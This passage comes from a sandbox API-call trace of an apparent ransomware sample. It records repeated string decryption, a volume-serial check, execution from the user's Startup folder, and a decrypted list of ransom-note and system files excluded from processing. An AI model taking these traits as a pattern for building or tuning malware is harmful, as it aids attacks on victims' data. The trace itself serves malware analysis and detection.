lpStartAddress=0x11530e4, lpParameter=0x26a1308, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x220 [0134.511] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x102 [0134.511] CloseHandle (hObject=0x220) returned 1 [0134.511] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0134.511] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x60) returned 0x26a1240 [0134.511] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f8b8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f920 | out: phKey=0x98f920*=0xaa9010) returned 1 [0134.511] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f908, dwFlags=0x0) returned 1 [0134.511] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f8d4 | out: pbData=0x26a1240, pdwDataLen=0x98f8d4) returned 1 [0134.511] CryptDestroyKey (hKey=0xaa9010) returned 1 [0134.511] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x5c) returned 0x26a13d0 [0134.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x11530e4, lpParameter=0x26a13d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x220 [0134.512] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1388) returned 0x102 [0139.773] CloseHandle (hObject=0x220) returned 1 [0139.773] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0139.773] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a14e8 [0139.773] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f880, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8e8 | out: phKey=0x98f8e8*=0xaa9010) returned 1 [0139.773] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f8d0, dwFlags=0x0) returned 1 [0139.773] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a14e8, pdwDataLen=0x98f89c | out: pbData=0x26a14e8, pdwDataLen=0x98f89c) returned 1 [0139.773] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.773] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1510 [0139.773] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a1240 [0139.773] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1268 [0139.773] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f858, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8c0 | out: phKey=0x98f8c0*=0xaa9610) returned 1 [0139.773] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x98f8a8, dwFlags=0x0) returned 1 [0139.773] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1268, pdwDataLen=0x98f874 | out: pbData=0x26a1268, pdwDataLen=0x98f874) returned 1 [0139.773] CryptDestroyKey (hKey=0xaa9610) returned 1 [0139.773] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1268 | out: hHeap=0x26a0000) returned 1 [0139.773] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1510, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.773] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0139.773] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a14e8 | out: hHeap=0x26a0000) returned 1 [0139.773] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x98f928, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x98f928*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.773] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1510 | out: hHeap=0x26a0000) returned 1 [0139.773] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a14e8 [0139.773] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a1518 [0139.774] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f864, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8cc | out: phKey=0x98f8cc*=0xaa9010) returned 1 [0139.774] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f8b4, dwFlags=0x0) returned 1 [0139.774] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1518, pdwDataLen=0x98f880 | out: pbData=0x26a1518, pdwDataLen=0x98f880) returned 1 [0139.774] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x60) returned 0x26a1240 [0139.774] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f85c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8c4 | out: phKey=0x98f8c4*=0xaa9010) returned 1 [0139.774] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f8ac, dwFlags=0x0) returned 1 [0139.774] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f878 | out: pbData=0x26a1240, pdwDataLen=0x98f878) returned 1 [0139.774] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x56) returned 0x26a12a8 [0139.774] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a12a8, Size=0xaa) returned 0x26a43c8 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a12a8 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x180) returned 0x26a4480 [0139.774] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f82c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f894 | out: phKey=0x98f894*=0xaa91d0) returned 1 [0139.774] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f87c, dwFlags=0x0) returned 1 [0139.774] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4480, pdwDataLen=0x98f848 | out: pbData=0x26a4480, pdwDataLen=0x98f848) returned 1 [0139.774] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x220) returned 0x26a4608 [0139.774] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f88c | out: phKey=0x98f88c*=0xaa91d0) returned 1 [0139.774] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f874, dwFlags=0x0) returned 1 [0139.774] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4608, pdwDataLen=0x98f840 | out: pbData=0x26a4608, pdwDataLen=0x98f840) returned 1 [0139.774] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a4830 [0139.774] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f864 | out: phKey=0x98f864*=0xaa92d0) returned 1 [0139.774] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f84c, dwFlags=0x0) returned 1 [0139.774] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4830, pdwDataLen=0x98f818 | out: pbData=0x26a4830, pdwDataLen=0x98f818) returned 1 [0139.774] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x84) returned 0x26a48c8 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x84) returned 0x26a4958 [0139.774] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a49e8 [0139.774] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f83c | out: phKey=0x98f83c*=0xaa91d0) returned 1 [0139.774] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f824, dwFlags=0x0) returned 1 [0139.774] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a49e8, pdwDataLen=0x98f7f0 | out: pbData=0x26a49e8, pdwDataLen=0x98f7f0) returned 1 [0139.774] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.774] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a49e8 | out: hHeap=0x26a0000) returned 1 [0139.774] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x26a48c8, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0139.774] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4958 | out: hHeap=0x26a0000) returned 1 [0139.775] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4830 | out: hHeap=0x26a0000) returned 1 [0139.775] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a12c0 [0139.775] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f860 | out: phKey=0x98f860*=0xaa92d0) returned 1 [0139.775] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f848, dwFlags=0x0) returned 1 [0139.775] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12c0, pdwDataLen=0x98f814 | out: pbData=0x26a12c0, pdwDataLen=0x98f814) returned 1 [0139.775] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.775] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x18) returned 0x26a12e8 [0139.775] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x18) returned 0x26a4830 [0139.775] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a4958 [0139.775] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f838 | out: phKey=0x98f838*=0xaa92d0) returned 1 [0139.775] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f820, dwFlags=0x0) returned 1 [0139.775] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4958, pdwDataLen=0x98f7ec | out: pbData=0x26a4958, pdwDataLen=0x98f7ec) returned 1 [0139.775] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.775] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4958 | out: hHeap=0x26a0000) returned 1 [0139.775] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x26a12e8, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0139.775] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4830 | out: hHeap=0x26a0000) returned 1 [0139.775] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12c0 | out: hHeap=0x26a0000) returned 1 [0139.775] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a4958 [0139.775] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a4b70 [0139.775] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26a4b70, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0139.775] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4b70 | out: hHeap=0x26a0000) returned 1 [0139.775] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x174) returned 0x26a4b70 [0139.775] GetLastError () returned 0x0 [0139.775] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a4b70, Size=0x38c) returned 0x26a4b70 [0139.775] GetLastError () returned 0x0 [0139.775] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a4830, Size=0x92) returned 0x26a4f08 [0139.775] GetLastError () returned 0x0 [0139.775] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f880, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8e8 | out: phKey=0x98f8e8*=0xaa9010) returned 1 [0139.775] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f8d0, dwFlags=0x0) returned 1 [0139.775] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1518, pdwDataLen=0x98f89c | out: pbData=0x26a1518, pdwDataLen=0x98f89c) returned 1 [0139.775] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.776] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1240 [0139.776] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a1268 [0139.776] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a04a0 [0139.776] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f858, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8c0 | out: phKey=0x98f8c0*=0xaa9010) returned 1 [0139.776] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f8a8, dwFlags=0x0) returned 1 [0139.776] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a04a0, pdwDataLen=0x98f874 | out: pbData=0x26a04a0, pdwDataLen=0x98f874) returned 1 [0139.776] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.777] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a04a0 | out: hHeap=0x26a0000) returned 1 [0139.777] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1240, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.777] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1268 | out: hHeap=0x26a0000) returned 1 [0139.777] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1518 | out: hHeap=0x26a0000) returned 1 [0139.777] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x98f928, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x98f928*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.778] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0139.778] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a1240 [0139.778] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a12e8 [0139.778] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f864, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8cc | out: phKey=0x98f8cc*=0xaa93d0) returned 1 [0139.778] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x98f8b4, dwFlags=0x0) returned 1 [0139.778] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12e8, pdwDataLen=0x98f880 | out: pbData=0x26a12e8, pdwDataLen=0x98f880) returned 1 [0139.778] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.778] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x60) returned 0x26a04a0 [0139.778] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f85c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8c4 | out: phKey=0x98f8c4*=0xaa91d0) returned 1 [0139.778] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f8ac, dwFlags=0x0) returned 1 [0139.778] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a04a0, pdwDataLen=0x98f878 | out: pbData=0x26a04a0, pdwDataLen=0x98f878) returned 1 [0139.778] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.778] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x56) returned 0x26a0508 [0139.778] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a0508, Size=0xaa) returned 0x26a7ed8 [0139.778] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10) returned 0x26a1518 [0139.778] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x180) returned 0x26a4480 [0139.778] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f82c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f894 | out: phKey=0x98f894*=0xaa92d0) returned 1 [0139.778] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f87c, dwFlags=0x0) returned 1 [0139.778] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4480, pdwDataLen=0x98f848 | out: pbData=0x26a4480, pdwDataLen=0x98f848) returned 1 [0139.778] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.778] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x220) returned 0x26a4608 [0139.778] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f88c | out: phKey=0x98f88c*=0xaa9010) returned 1 [0139.779] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f874, dwFlags=0x0) returned 1 [0139.779] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4608, pdwDataLen=0x98f840 | out: pbData=0x26a4608, pdwDataLen=0x98f840) returned 1 [0139.779] CryptDestroyKey (hKey=0xaa9010) returned 1 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a0508 [0139.779] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f864 | out: phKey=0x98f864*=0xaa92d0) returned 1 [0139.779] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f84c, dwFlags=0x0) returned 1 [0139.779] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a0508, pdwDataLen=0x98f818 | out: pbData=0x26a0508, pdwDataLen=0x98f818) returned 1 [0139.779] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x84) returned 0x26a4830 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x84) returned 0x26a48c0 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a4950 [0139.779] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f83c | out: phKey=0x98f83c*=0xaa91d0) returned 1 [0139.779] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f824, dwFlags=0x0) returned 1 [0139.779] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a4950, pdwDataLen=0x98f7f0 | out: pbData=0x26a4950, pdwDataLen=0x98f7f0) returned 1 [0139.779] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0139.779] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a4950 | out: hHeap=0x26a0000) returned 1 [0139.779] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x26a4830, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0139.779] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a48c0 | out: hHeap=0x26a0000) returned 1 [0139.779] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a0508 | out: hHeap=0x26a0000) returned 1 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a1270 [0139.779] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f860 | out: phKey=0x98f860*=0xaa93d0) returned 1 [0139.779] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x98f848, dwFlags=0x0) returned 1 [0139.779] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1270, pdwDataLen=0x98f814 | out: pbData=0x26a1270, pdwDataLen=0x98f814) returned 1 [0139.779] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x18) returned 0x26a7f90 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x18) returned 0x26a7fb0 [0139.779] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a0508 [0139.779] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f838 | out: phKey=0x98f838*=0xaa92d0) returned 1 [0139.780] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x98f820, dwFlags=0x0) returned 1 [0139.780] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a0508, pdwDataLen=0x98f7ec | out: pbData=0x26a0508, pdwDataLen=0x98f7ec) returned 1 [0139.780] CryptDestroyKey (hKey=0xaa92d0) returned 1 [0139.780] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a0508 | out: hHeap=0x26a0000) returned 1 [0139.780] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x26a7f90, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0139.780] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a7fb0 | out: hHeap=0x26a0000) returned 1 [0139.780] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1270 | out: hHeap=0x26a0000) returned 1 [0139.780] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a48c0 [0139.780] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20a) returned 0x26a7fb0 [0139.780] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26a7fb0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0139.780] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a7fb0 | out: hHeap=0x26a0000) returned 1 [0139.780] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x174) returned 0x26a7fb0 [0139.780] GetLastError () returned 0x0 [0139.780] RtlReAllocateHeap (Heap=0x26a0000, Flags=0x0, Ptr=0x26a4ad8, Size=0x92) returned 0x26a0508 [0139.780] GetLastError () returned 0x0 [0139.782] WaitForSingleObject (hHandle=0x284, dwMilliseconds=0xffffffff) Thread: id = 72 os_tid = 0xf08 Thread: id = 77 os_tid = 0xf1c [0134.572] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a12a8 [0134.572] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc40 | out: phKey=0x266fc40*=0xaa93d0) returned 1 [0134.572] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x266fc28, dwFlags=0x0) returned 1 [0134.572] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x266fbf4 | out: pbData=0x26a12a8, pdwDataLen=0x266fbf4) returned 1 [0134.572] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0134.572] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a12d0 [0134.572] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a1438 [0134.572] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a1460 [0134.572] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fbb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc18 | out: phKey=0x266fc18*=0xaa91d0) returned 1 [0134.572] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x266fc00, dwFlags=0x0) returned 1 [0134.572] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1460, pdwDataLen=0x266fbcc | out: pbData=0x26a1460, pdwDataLen=0x266fbcc) returned 1 [0134.572] CryptDestroyKey (hKey=0xaa91d0) returned 1 [0134.573] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1460 | out: hHeap=0x26a0000) returned 1 [0134.573] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a12d0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.573] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1438 | out: hHeap=0x26a0000) returned 1 [0134.573] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12a8 | out: hHeap=0x26a0000) returned 1 [0134.573] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x266fc80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x266fc80*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.573] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12d0 | out: hHeap=0x26a0000) returned 1 [0134.573] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a12a8 [0134.573] CryptImportKey (in: hProv=0xa968b8, pbData=0x266fc0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x266fc74 | out: phKey=0x266fc74*=0xaa92d0) returned 1 [0134.573] CryptSetKeyParam (hKey=0xaa92d0, dwParam=0x1, pbData=0x266fc5c, dwFlags=0x0) returned 1 [0134.573] CryptDecrypt (in: hKey=0xaa92d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12a8, pdwDataLen=0x266fc28 | out: pbData=0x26a12a8, pdwDataLen=0x266fc28) returned 1 [0134.573] CryptDestroyKey (hKey=0xaa92d0) 